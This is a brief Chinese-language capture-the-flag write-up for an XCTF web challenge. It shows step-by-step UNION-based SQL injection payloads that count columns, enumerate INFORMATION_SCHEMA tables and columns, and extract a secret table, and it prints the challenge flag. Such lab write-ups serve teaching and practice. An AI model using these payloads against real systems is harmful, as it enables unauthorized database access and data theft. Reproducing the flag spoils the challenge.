题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1
首先用 ' and 0 union select 1,2,3 #
来初步判断该sql查询返回三列数据
然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
得到表名,很明显我们需要得到 secret_table 表中的内容
再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
得到 secret_table 表的列名以及数据类型
最后就可以简单粗暴地得到flag
' and 0 union select 1,2,fl4g from secret_table #
得到flag:QCTF{sq1_inJec7ion_ezzz}